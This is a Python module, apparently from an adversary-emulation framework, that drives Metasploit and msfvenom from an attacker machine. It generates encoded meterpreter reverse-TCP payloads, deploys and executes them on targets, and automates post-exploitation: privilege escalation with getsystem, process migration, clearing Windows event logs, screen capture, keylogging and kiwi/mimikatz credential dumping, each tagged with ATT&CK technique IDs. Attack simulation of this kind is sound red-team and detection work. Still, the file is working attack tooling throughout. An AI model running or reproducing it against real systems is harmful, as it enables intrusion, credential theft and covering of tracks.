#!/usr/bin/env python3 """ Module to control Metasploit and related tools (MSFVenom) on the attack server """ import time import socket import os import random import requests from pymetasploit3.msfrpc import MsfRpcClient # from app.machinecontrol import Machine from app.attack_log import AttackLog from app.interface_sfx import CommandlineColors from app.exceptions import MetasploitError, ServerError # https://github.com/DanMcInerney/pymetasploit3 class Metasploit(): """ Metasploit class for basic Metasploit wrapping """ def __init__(self, password, attack_logger, **kwargs): """ :param password: password for the msfrpcd :param attack_logger: The attack logger to use for logging/printing :param kwargs: Relevant ones: uri, port, server, username """ self.password: str = password self.attack_logger: AttackLog = attack_logger self.username: str = kwargs.get("username", None) self.kwargs = kwargs self.client = None # Optional attacker: If a running attacker machine is passed, we take it and start the msfrpcd # Alternative: The server is taken and we expect an already running msfrpcd there self.attacker = kwargs.get("attacker", None) if self.attacker: # we expect a running attacker but without a running msfrcpd self.start_msfrpcd() kwargs["server"] = self.attacker.get_ip() time.sleep(3) # Waiting for server to start. Or we would get https connection errors when getting the client. def start_exploit_stub_for_external_payload(self, payload='linux/x64/meterpreter_reverse_tcp', exploit='exploit/multi/handler', lhost=None): """ Start a metasploit handler and wait for external payload to connect :param payload: The payload being used in the implant :param exploit: Normally the generic handler. Overwrite it if you feel lucky :param lhost: the ip of the attack host. Use this to use the attacker ip as seen from the controller. :returns: res, which contains "job_id" and "uuid" """ exp = self.get_client().modules.use('exploit', exploit) # print(exploit.description) # print(exploit.missing_required) pl = self.get_client().modules.use('payload', payload) # pylint: disable=invalid-name # print(payload.description) # print(payload.missing_required) if lhost is None: lhost = self.attacker.get_ip() pl["LHOST"] = lhost print(f"Creating stub for external payload Exploit: {exploit} Payload: {payload}, lhost: {lhost}") res = exp.execute(payload=pl) print(res) return res def __msfrpcd_cmd__(self): return f"killall msfrpcd; nohup msfrpcd -P {self.password} -U {self.username} -S &" def start_msfrpcd(self): """ Starts the msfrpcs on the attacker. Metasploit must alredy be installed there ! """ # cmd = f"killall msfrpcd; nohup msfrpcd -P {self.password} -U {self.username} -S &" self.attacker.remote_run(self.__msfrpcd_cmd__(), disown=True) # print("msfrpcd started") # breakpoint() time.sleep(3) def get_client(self): """ Get a local metasploit client connected to the metasploit server """ # print("starting get client") # print(f"Password: {self.password}") # print(f"Kwargs: {self.kwargs}") if self.client: return self.client self.client = None retries = 5 sleeptime = 5 while retries: try: self.client = MsfRpcClient(self.password, **self.kwargs) break except requests.exceptions.ConnectionError: self.start_msfrpcd() time.sleep(sleeptime) sleeptime += 5 print(f"Failed getting connection to msfrpcd. Retries left: {retries}") retries -= 1 if self.client is None: raise ServerError("Was not able to properly start and connect to msfrpcd") return self.client def wait_for_session(self, retries=50): """ Wait until we get a session """ while self.get_client().sessions.list == {}: time.sleep(1) print(f"Metasploit waiting to get any session {retries}") retries -= 1 if retries <= 0: raise MetasploitError("Can not find any session") def get_sid(self, session_number=0): """ Get the first session between hacked target and the metasploit server :param session_number: number of the session to get """ self.wait_for_session() return list(self.get_client().sessions.list)[session_number] def get_sid_to(self, target): """ Get the session to a specified target :param target: a target machine to find in the session list """ print(f"Sessions: {self.get_client().sessions.list}") # Get_ip can also return a network name. Matching a session needs a real ip name_resolution_worked = True try: target_ip = socket.gethostbyname(target.get_ip()) except socket.gaierror: target_ip = target.get_ip() # Limp on feature if we can not get a name resolution name_resolution_worked = False print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}") retries = 100 while retries > 0: for key, value in self.get_client().sessions.list.items(): if value["session_host"] == target_ip: # print(f"session list: {self.get_client().sessions.list}") return key time.sleep(1) retries -= 1 raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}") def meterpreter_execute(self, cmds: list[str], session_number: int, delay=0) -> list[str]: """ Executes commands on the meterpreter, returns results read from shell :param cmds: commands to execute, a list :param session_number: session number :param delay: optional delay between calling the command and expecting a result :return: the string results """ shell = self.client.sessions.session(self.get_sid(session_number)) res = [] for cmd in cmds: shell.write(cmd.strip()) time.sleep(delay) res.append(shell.read()) return res def meterpreter_execute_on(self, cmds: list[str], target, delay=0) -> list[str]: """ Executes commands on the meterpreter, returns results read from shell :param cmds: commands to execute, a list :param target: target machine :param delay: optional delay between calling the command and expecting a result :return: the string results """ session_id = self.get_sid_to(target) # print(f"Session ID: {session_id}") shell = self.client.sessions.session(session_id) res = [] time.sleep(1) # To ensure an active session for cmd in cmds: shell.write(cmd) time.sleep(delay) retries = 20 shell_result = "" while retries > 0: shell_result += shell.read() time.sleep(0.5) # Command needs time to execute retries -= 1 res.append(shell_result) return res def smart_infect(self, target, **kwargs): """ Checks if a target already has a meterpreter session open. Will deploy a payload if not. :param target: Infect the target """ # TODO Smart_infect should detect the platform of the target and pick the proper parameters based on that payload_name = kwargs.get("outfile", "babymetal.exe") payload_type = kwargs.get("payload", None) retries = 3 if payload_type is None: raise MetasploitError("Payload not defined") try: ip = socket.gethostbyname(self.attacker.get_ip()) # pylint: disable=invalid-name self.start_exploit_stub_for_external_payload(payload_type, lhost=kwargs.get("lhost", ip)) self.wait_for_session(2) except MetasploitError: while retries: self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Create payload {payload_name} {CommandlineColors.ENDC}", 1) venom = MSFVenom(self.attacker, target, self.attack_logger) venom.generate_and_deploy(**kwargs) self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {payload_name} - waiting for meterpreter shell{CommandlineColors.ENDC}", 1) self.start_exploit_stub_for_external_payload(payload=payload_type, lhost=kwargs.get("lhost", None)) try: self.wait_for_session(100) break except MetasploitError: retries -= 1 print(f"Global metasploit retries: {retries}") ########################################################################## class MSFVenom(): """ Class to remote controll payload generator MSFVenom on the attacker machine """ def __init__(self, attacker, target, attack_logger: AttackLog): """ :param attacker: attacker machine :param target: target machine :param attack_logger: The logger for the attack """ # https://www.offensive-security.com/metasploit-unleashed/msfvenom/ self.attacker = attacker self.target = target self.attack_logger = attack_logger def generate_payload(self, **kwargs): """ Generates a payload on the attacker machine """ payload = kwargs.get("payload", None) architecture = kwargs.get("architecture", None) platform = kwargs.get("platform", self.target.get_os()) lhost = kwargs.get("lhost", self.attacker.get_ip()) file_format = kwargs.get("format", None) # file format outfile = kwargs.get("outfile", "payload.exe") encoder = kwargs.get("encoder", None) iterations = kwargs.get("iterations", None) cmd = "msfvenom" if architecture is not None: if architecture not in ["x86", "x64"]: raise MetasploitError(f"MSFVenom wrapper does not support architecture {architecture}") cmd += f" -a {architecture}" if platform is not None: if platform not in ["windows", "linux"]: raise MetasploitError(f"MSFVenom wrapper does not support platform {platform}") cmd += f" --platform {platform}" if payload is not None: cmd += f" -p {payload}" if lhost is not None: cmd += f" LHOST={lhost}" if file_format is not None: cmd += f" -f {file_format}" if outfile is not None: cmd += f" -o {outfile}" if encoder is not None: if encoder not in ["x86/shikata_ga_nai"]: raise MetasploitError(f"MSFVenom wrapper does not support encoder {encoder}") cmd += f" -e {encoder}" if iterations is not None: cmd += f" -i {iterations}" cmd += " SessionRetryWait=1 " # Detecting all the mistakes that already have been made. To be continued # Check if encoder supports the architecture if encoder == "x86/shikata_ga_nai" and architecture == "x64": raise MetasploitError(f"Encoder {encoder} does not support 64 bit architecture") # Check if payload is for the right amount of bit if architecture == "x64" and "/x64/" not in payload: raise MetasploitError(f"Payload {payload} does not support 64 bit architecture") if architecture == "x86" and "/x64/" in payload: raise MetasploitError(f"Payload {payload} does not support 32 bit architecture") # Check if payload is platform if platform not in payload: raise MetasploitError(f"Payload {payload} support platform {platform}") # Footnote: Currently we only support windows/linux and the "boring" payloads. This will be more tricky as soon as we get creative here print(f"MSFVenom: {cmd}") self.attacker.remote_run(cmd) def generate_and_deploy(self, **kwargs): """ Will generate the payload and directly deploy it to the target """ self.generate_payload(**kwargs) payload_name = kwargs.get("outfile", "payload.exe") self.attacker.get(payload_name, self.target.get_machine_path_external()) src = os.path.join(self.target.get_machine_path_external(), payload_name) self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Generated {payload_name}...deploying it{CommandlineColors.ENDC}", 1) # Deploy to target if self.attack_logger: logid = self.attack_logger.start_file_write("", self.target.get_name(), payload_name) playground = self.target.get_playground() print(f"Putting to {self.target.get_name() }/ {playground}") self.target.put(src, playground) if self.attack_logger: self.attack_logger.stop_file_write("", self.target.get_name(), payload_name, logid=logid) if self.target.get_os() == "linux": if self.target.get_playground() is not None: cmd = f"cd {self.target.get_playground()};" else: cmd = "" cmd += f"chmod +x {payload_name}; ./{payload_name}" if self.target.get_os() == "windows": cmd = f'wmic process call create "%homepath%\\{payload_name}",""' print(cmd) if self.attack_logger: logid = self.attack_logger.start_execute_payload("", self.target.get_name(), cmd) res = self.target.remote_run(cmd, disown=True) print(f"Running payload, result is {res}") if self.attack_logger: self.attack_logger.stop_execute_payload("", self.target.get_name(), cmd, logid=logid) self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Executed payload {payload_name} on {self.target.get_name()} {CommandlineColors.ENDC}", 1) ################ class MetasploitInstant(Metasploit): """ A simple metasploit class with pre-defined metasploit attacks and logging. Just add water The attacks pre-defioned in here are the bread-and-butter attacks, the most basic ones. Those you will need all the time when simulating and adversary. No need to add specific/specific ones in here. In attack plugins you will find all the features as well. Better code them there. """ def parse_ps(self, ps_output) -> list[dict]: """ Parses the data from ps :param ps_output: Metasploit ps output :return: A list of dicts """ ps_data = [] for line in ps_output.split("\n")[6:]: pieces = line.split(" ") cleaned_pieces = [] for piece in pieces: if len(piece): cleaned_pieces.append(piece) if len(cleaned_pieces) > 2: rep = {"PID": int(cleaned_pieces[0].strip()), "PPID": int(cleaned_pieces[1].strip()), "Name": cleaned_pieces[2].strip(), "Arch": None, "Session": None, "User": None, "Path": None} if len(cleaned_pieces) >= 4: rep["Arch"] = cleaned_pieces[3].strip() if len(cleaned_pieces) >= 5: rep["Session"] = int(cleaned_pieces[4].strip()) if len(cleaned_pieces) >= 6: rep["User"] = cleaned_pieces[5].strip() if len(cleaned_pieces) >= 7: rep["Path"] = cleaned_pieces[6].strip() ps_data.append(rep) return ps_data def filter_ps_results(self, data, user=None, name=None, arch=None): """ Filter the process lists for certain :param user: The user to filter for. :param name: The process name to filter for (executable name) :param arch: The architecture to select. 'x64' is one option """ res = data if user is not None: res = [item for item in res if item["User"] == user] if name is not None: res = [item for item in res if item["Name"].lower() == name.lower()] if arch is not None: res = [item for item in res if item["Arch"] == arch] return res def ps_process_discovery(self, target, **kwargs): """ Do a process discovery on the target """ command = "ps -ax" ttp = "T1057" tactics = "Discovery" tactics_id = "TA0007" description = "Process discovery can be used to identify running security solutions, processes with elevated privileges, interesting services." self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="ps", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def migrate(self, target, user=None, name=None, arch=None): """ Migrate to a process matching certain criteria :param user: The user to filter for. :param name: The process name to filter for (executable name) :param arch: The architecture to select. 'x64' is one option """ ttp = "T1055" tactics = "Privilege Escalation" tactics_id = "TA0004" description = "Migrating to another process can escalate privileges, move the meterpreter to a long running process or evade detection. For that the Meterpreter stub is injected into another process and the new stub then connects to the Metasploit server instead of the old one." process_list = self.ps_process_discovery(target) ps = self.parse_ps(process_list[0]) # pylint: disable=invalid-name filtered_list = self.filter_ps_results(ps, user, name, arch) if len(filtered_list) == 0: print(process_list) raise MetasploitError("Did not find a matching process to migrate to") # picking random target process target_process = random.choice(filtered_list) print(f"Migrating to process {target_process}") command = f"migrate {target_process['PID']}" logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, name="migrate", description=description, tactics=tactics, tactics_id=tactics_id, ttp=ttp) res = self.meterpreter_execute_on([command], target, delay=5) print(f"Result of migrate {res}") self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, result=res, logid=logid) return res def arp_network_discovery(self, target, **kwargs): """ Do a network discovery on the target """ command = "arp" ttp = "T1016" tactics = "Discovery" tactics_id = "TA0007" description = "Network discovery can be a first step for lateral movement." self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="arp", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def nslookup(self, target, target2, **kwargs): """ Do a nslookup discovery on the target :param target: Command runs here :param target2: This one is looked up """ command = f"execute -f nslookup.exe -H -i -a '{target2.get_ip()}'" ttp = "T1018" tactics = "Discovery" tactics_id = "TA0007" description = "Nslookup to get information on a specific target" self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="nslookup", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def getsystem(self, target, variant=0, **kwargs): """ Do a network discovery on the target :param target: Target to attack :param variant: Variant of getsystem to use. 0 is auto, max is 3 """ command = "getsystem" ttp = "????" # It uses one out of three different ways to elevate privileges. tactics = "Privilege Escalation" tactics_id = "TA0004" description = """ Elevate privileges from local administrator to SYSTEM. Three ways to do that will be tried:\n 0) auto \n 1) named pipe impersonation using cmd \n 2) named pipe impersonation using a dll \n 3) token duplication\n """ if variant != 0: command += f" -t {variant}" # https://docs.rapid7.com/metasploit/meterpreter-getsystem/ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="getsystem", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def clearev(self, target, **kwargs): """ Clears windows event logs """ command = "clearev" ttp = "T1070.001" # It uses one out of three different ways to elevate privileges. tactics = "Defense Evasion" tactics_id = "TA0005" description = """ Clear windows event logs to hide tracks """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="clearev", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def screengrab(self, target, **kwargs): """ Creates a screenshot Before using it, migrate to a process running while you want to monitor. One with the permission "NT AUTHORITY\\SYSTEM" """ command = "screengrab" ttp = "T1113" # It uses one out of three different ways to elevate privileges. tactics = "Collection" tactics_id = "TA0009" description = """ Do screen grabbing to collect data on target """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="screengrab", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on(["use espia"], target) print(res) res = self.meterpreter_execute_on([command], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def keylogging(self, target, monitoring_time, **kwargs): """ Starts keylogging Before using it, migrate to a process running while you want to monitor. "winlogon.exe" will monitor user logins. "explorer.exe" during the session. :param monitoring_time: Seconds the keylogger is running """ command = "keyscan_start" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. tactics = "Collection" tactics_id = "TA0009" description = """ Log keys to get passwords and other credentials """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="keylogging", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) print(res) time.sleep(monitoring_time) res = self.meterpreter_execute_on(["keyscan_dump"], target) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def getuid(self, target, **kwargs): """ Returns the UID """ command = "getuid" ttp = "T1056.001" # It uses one out of three different ways to elevate privileges. tactics = "Collection" tactics_id = "TA0009" description = """ Get user id """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="getuid", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res[0] def sysinfo(self, target, **kwargs): """ Returns the sysinfo """ command = "sysinfo" ttp = "T1082" # It uses one out of three different ways to elevate privileges. tactics = "Discovery" tactics_id = "TA0007" description = """ Get basic system information """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="sysinfo", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None)) res = self.meterpreter_execute_on([command], target) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res[0] def upload(self, target, src, dst, **kwargs): """ Upload file from metasploit controller to target :param src: source file name on metasploit controller :param dst: destination file name on target machine """ command = f"upload {src} '{dst}' " ttp = "????" # It uses one out of three different ways to elevate privileges. tactics = "???" tactics_id = "???" description = """ Uploading new files to the target. Can be config files, tools, implants, ... """ self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="upload", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res = self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) print(res) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) return res def kiwi(self, target, variant="creds_all", **kwargs): """ Kiwi is the modern equivalent to mimikatz :param target: target being attacked :param variant: kiwi command being used """ ttp = "t1003" tactics = "Credential access" tactics_id = "TA0006" description = """ Accessing user credentials in memory """ res = [] self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Preparing for Kiwi{CommandlineColors.ENDC}", 1) # We need system privileges self.getsystem(target, 0, **kwargs) # Kiwi needs to be loaded command = "load kiwi " res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) # Executing kiwi command = f"{variant} " self.attack_logger.vprint( f"{CommandlineColors.OKCYAN}Execute {command} through meterpreter{CommandlineColors.ENDC}", 1) logid = self.attack_logger.start_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, name="kiwi", description=description, tactics=tactics, tactics_id=tactics_id, situation_description=kwargs.get("situation_description", None), countermeasure=kwargs.get("countermeasure", None) ) res += self.meterpreter_execute_on([command], target, kwargs.get("delay", 10)) self.attack_logger.stop_metasploit_attack(source=self.attacker.get_ip(), target=target.get_ip(), metasploit_command=command, ttp=ttp, logid=logid, result=res) print(res) return res